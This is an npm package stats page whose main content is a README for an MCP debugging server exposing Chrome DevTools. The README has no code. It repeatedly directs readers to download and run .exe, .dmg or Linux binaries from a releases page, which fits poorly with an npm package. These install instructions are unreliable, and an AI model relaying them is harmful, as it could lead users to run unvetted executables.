npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

@iflow-mcp/gulhidayat-devtools-debugger-mcp

v1.0.0

Published

MCP server exposing full Chrome DevTools Protocol debugging: breakpoints, stepping, call stacks, eval, and source maps. Also supports tab control, JS execution, screenshots, and network monitoring.

Readme

🎯 devtools-debugger-mcp - Easily Debug with Chrome Tools

🌟 Overview

Welcome to the devtools-debugger-mcp project! This application allows you to debug your applications using a server that exposes the full Chrome DevTools Protocol. With features like breakpoints, step/run execution, call stacks, eval, and source maps, you'll find it easier to catch issues and improve your code.

🔗 Download Now

Download Now

🚀 Getting Started

To get started with devtools-debugger-mcp, follow these steps to download and run the software.

Step 1: Visit the Download Page

Go to the releases page to find the latest version of devtools-debugger-mcp. You can do this by clicking the link below:

Visit Releases Page

Step 2: Choose Your Version

On the releases page, you will see a list of available versions. Look for the latest version. Each version will have a release date and a brief description of changes.

Step 3: Download the Application

Find the file that suits your operating system (Windows, macOS, or Linux). Click on the file name to download it. The file will be saved to your computer.

Step 4: Install the Application

Once the download completes, locate the file you just downloaded:

  • For Windows: Double-click the .exe file and follow the instructions on the screen to install.
  • For macOS: Open the .dmg file and drag the app into your Applications folder.
  • For Linux: Open a terminal, navigate to the folder where the file is saved, and run chmod +x <filename> to make it executable, then run ./<filename> to install.

Step 5: Run the Application

After installation, you can find the devtools-debugger-mcp application in your applications list. Double-click it to launch the app.

⚙️ System Requirements

Make sure your system meets the following requirements before installing:

  • Operating System: Windows 10 or later, macOS 10.14 or later, Linux (latest distributions recommended).
  • CPU: Dual-core processor or better.
  • RAM: Minimum of 4 GB; 8 GB recommended for better performance.
  • Disk Space: At least 100 MB of free space.

🎉 Features

Here are some powerful features of devtools-debugger-mcp that enhance your debugging experience:

  • Breakpoints: Set breakpoints in your code, allowing you to halt execution and examine the state.
  • Step/Run Functionality: Easily step through your code line by line or run to the next breakpoint.
  • Call Stacks: View the call stack to understand how your code reached a specific point.
  • Eval: Test snippets of code in real-time using the eval feature.
  • Source Maps: Work with transpiled code easily, allowing for clearer debugging.

📘 Usage Instructions

Once you run the application, you will see a user-friendly interface:

  1. Connect to Your Application: Input the URL of the application you want to debug.
  2. Open Developer Tools: You can utilize the Chrome Developer Tools to inspect elements and monitor your application's performance.
  3. Set Breakpoints: Click on the line numbers in the code view to toggle breakpoints.
  4. View Call Stack: Use the call stack panel to analyze the sequence of function calls.

📥 Download & Install

To download the latest version of devtools-debugger-mcp, click the link below:

Download from Releases Page

🛠️ Troubleshooting

If you encounter any issues, here are some common solutions:

  • Application Won't Start: Make sure that you have the required permissions set on the file. Try running it as an administrator (Windows) or check permissions (macOS/Linux).
  • Connection Issues: Ensure that the URL you entered is correct and that the application you want to debug is running.
  • Missing Features: Check the release notes to see if the features you expect are included in the version you downloaded.

💬 Community Support

If you have questions or need assistance, feel free to join our community. Engage with other users, share your experiences, and look for help.

🔗 Additional Resources

  • Documentation: For more details on how to use the application effectively, please refer to our documentation.
  • FAQs: Check out our FAQs page for quick answers to common questions.

Thank you for using devtools-debugger-mcp. Happy debugging!